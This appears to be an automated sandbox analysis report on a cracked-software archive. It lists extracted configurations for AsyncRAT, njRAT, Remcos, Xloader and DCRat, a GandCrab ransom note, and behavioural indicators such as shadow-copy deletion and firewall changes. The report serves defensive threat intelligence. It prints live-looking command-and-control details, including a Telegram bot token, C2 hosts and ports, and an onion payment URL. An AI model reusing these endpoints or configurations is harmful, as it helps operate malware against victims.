asyncrat | 67c12eda1cc8358e06ef29eabf1542bf68db9da45df65c52d0ac03246bf75e03

Resubmissions

09-09-2024 23:39

240909-3nkmdswdqm 10

09-09-2024 23:31

09-09-2024 23:11

09-09-2024 22:25

09-09-2024 22:07

09-09-2024 21:53

09-09-2024 21:44

Analysis

max time kernel
128s
max time network
279s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
09-09-2024 23:31

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

クラック.zip
Size

13.4MB
MD5

6c5fc1a3ba386a83c87700f54d62a96f
SHA1

a05f08de3e4f218ad2567a2695d0ca500fb48ecf
SHA256

67c12eda1cc8358e06ef29eabf1542bf68db9da45df65c52d0ac03246bf75e03
SHA512

0a2573e40287c35c5a05c9b84fd5fd41bacc16c1bb565ee823ff6a42610c151f460a4be6d7009f0a70b648234aa998af27769ae667f4649c223c39c07449a098
SSDEEP

393216:T0Wxsts7B2+qq0a1n5Gy0vdymghya/2yswYpmTg:wGg1+0a1nYvvJghD/2yMM8

Malware Config

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

njrat

Version

im523

Botnet

puked

147.185.221.20:47570

Mutex

20006afb0ec33f2e48c8c1f17d4d3382

Attributes

reg_key
20006afb0ec33f2e48c8c1f17d4d3382
splitter
|'|'|

Extracted

Family

remcos

Botnet

AUGUST CRYPTER TOOLZ GRACE STUB

teamfavour222.ddns.net :6767

odogwuvisual123.duckdns.org:6767

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
-YFLE4M
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Path

C:\$Recycle.Bin\S-1-5-21-2412658365-3084825385-3340777666-1000\WYCTFAL-DECRYPT.txt

Ransom Note

---= GANDCRAB V5.0.3 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE WILL BE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .WYCTFAL The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/eadf193d5f1ce137 | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- wfKD6iudumBkmpL8IRr4U4exEVaoOXLtwDwmOrT1y1YWvOiWMx5GYaRdvZZfToFRunYP7ntWvLfSTHKHhh5qBJzzs9MC7736UkGSDDniUJJG8/LFF//kmGmoAZAGLo2j5/wd2UrxMJK+iqKhTkS3ArgAxrZOOOiXrbnhbWMkLHQnbYuWlMClYZxYU6SDxpopRo5r292AV1KIZBZV4APBuUHcKSIr2MWMI0O1MKIP2IpKLE2TS5wNmoQoAHZIP7k/TfrG1tVzlDb3jcZAB3gql9dnWN0lCD4xdg7bDNQrvH1xSi3FCw+6kfktKtizqdynr7r154JiurEmkUXBteL1/zI2R+snGtJYb1rXBiLt+xHXEYob9CcT4tq4PKb3Y5NyPYz32XaispQRTRkqF1PXJPcJ15EHwNAoARPLnK8+Au5ZALyfhGEwg6hrKQ3vxBFKwg70Zi7pDhFO3vDLMuao1wQZMnQeRlGKYDmn1lvgAn90mSDf7SyGQSZnn7Ivlsuw7HIKVYbpfzf2fBccdMBnP2lNhH9XQ3DC2qZAEuDtLkioBZ9MNJGhHpcOfb/LRc8P54k7V/HuibORzJL9NXYEh8sz/ewORahtHP+ZbmbW4eJPXp1eNtQ19EJhJFLe2qhgw2mJLRMzwAtbfjn5E2ENiW4EkrJfTw== ---END PC DATA---

URLs

http://gandcrabmfe6mnef.onion/eadf193d5f1ce137

Extracted

Family

xloader

Version

2.6

Campaign

eido

Decoy

revellbb.com

tempranillowine.net

viralstrategies.info

blacktxu.com

flfththirdbank.com

vaoex.com

theselfdirectedinvestor.com

vinadelmar.travel

othersidejimmythemonkey.com

jaguar-landrovercenter-graz.com

supremeosterreich.com

chatsubs.com

free99.design

serviciosmvs.com

bongmecams.xyz

malikwoodson.com

onlinegamebox.club

694624.com

yeezyzapatos.club

istanbul-hairtransplant.com

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

192.168.1.42:5552

Mutex

bf7b1fe7a7644171a9985ea45221c25c

Attributes

reg_key
bf7b1fe7a7644171a9985ea45221c25c
splitter
|'|'|

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5292	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5628	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5548	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5936	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6596	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6652	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6916	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6112	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5856	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5220	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6768	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6864	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4084	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6916	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6712	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6732	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6332	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5680	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6716	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6484	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5428	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6672	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2964	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	724	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6476	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7340	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7432	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5436	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7664	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7656	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7860	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8012	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8168	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7024	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5740	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5808	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7484	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6684	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6768	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7220	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7656	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6484	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6184	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6704	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3096	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7684	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7984	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6284	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6768	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6056	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7732	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7448	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7852	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5252	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7748	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6628	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6620	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7848	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5148	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6056	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5356	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7176	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6900	3940	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7248	3940	schtasks.exe

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

Processes:

resource	yara_rule
C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe	family_stormkitty
behavioral1/memory/4660-601-0x0000000000F00000-0x0000000000F32000-memory.dmp	family_stormkitty

Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe	family_asyncrat

DCRat payload 4 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe	dcrat
behavioral1/memory/1908-589-0x0000000000540000-0x0000000000616000-memory.dmp	dcrat
C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe	dcrat
behavioral1/memory/2620-647-0x0000000000B60000-0x0000000000C36000-memory.dmp	dcrat

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Xloader payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/7560-2382-0x0000000000400000-0x000000000042B000-memory.dmp	xloader
behavioral1/memory/7516-2491-0x00000000004F0000-0x000000000051B000-memory.dmp	xloader

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

Powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5632	Powershell.exe
8168	powershell.exe
7268	powershell.exe
6480	powershell.exe
5956	powershell.exe
5504	powershell.exe
3584	powershell.exe
7824	powershell.exe
7808	powershell.exe
7180	powershell.exe
6896	powershell.exe
7484	powershell.exe

Modifies Windows Firewall 2 TTPs 5 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

7544 netsh.exe
1088 netsh.exe
7792 netsh.exe
3132 netsh.exe
5604 netsh.exe

pid	process
7544	netsh.exe
1088	netsh.exe
7792	netsh.exe
3132	netsh.exe
5604	netsh.exe

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/5412-1027-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/5412-1026-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/5412-2142-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/5412-1723-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/5412-2298-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/5412-2312-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/5412-691-0x0000000000400000-0x000000000048A000-memory.dmp	upx
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe	upx
behavioral1/memory/5412-2492-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/5412-2877-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/5412-2968-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/5412-3081-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/5412-3209-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/5412-3378-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/5412-3513-0x0000000000400000-0x000000000048A000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Program Files (x86)\Darkest Dungeon setub.exe	vmprotect

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

253 discord.com
258 discord.com
System Binary Proxy Execution: Verclsid 1 TTPs 1 IoCs
Adversaries may abuse Verclsid to proxy execution of malicious code.
defense_evasion

Verclsid
T1218.012

Processes:

verclsid.exe

pid process

7084 verclsid.exe
Drops file in Program Files directory 1 IoCs

Processes:

クラック.exe

description ioc process

File created C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe クラック.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

7112 6184 WerFault.exe schtasks.exe
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

クラック.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language クラック.exe
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
discovery

Wi-Fi Discovery
T1016.002

Processes:

cmd.exenetsh.exe

pid process

5228 cmd.exe
4248 netsh.exe

flow	ioc
253	discord.com
258	discord.com

pid	process
7084	verclsid.exe

description	ioc	process
File created	C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe	クラック.exe

pid	pid_target	process	target process
7112	6184	WerFault.exe	schtasks.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	クラック.exe

pid	process
5228	cmd.exe
4248	netsh.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

8020 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

7516 ipconfig.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

6848 taskkill.exe

pid	process
8020	timeout.exe

pid	process
7516	ipconfig.exe

pid	process
6848	taskkill.exe

Modifies registry class 50 IoCs

Processes:

firefox.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac04000000c8000000354b179bff40d211a27e00c04fc308710300000080000000354b179bff40d211a27e00c04fc308710200000080000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
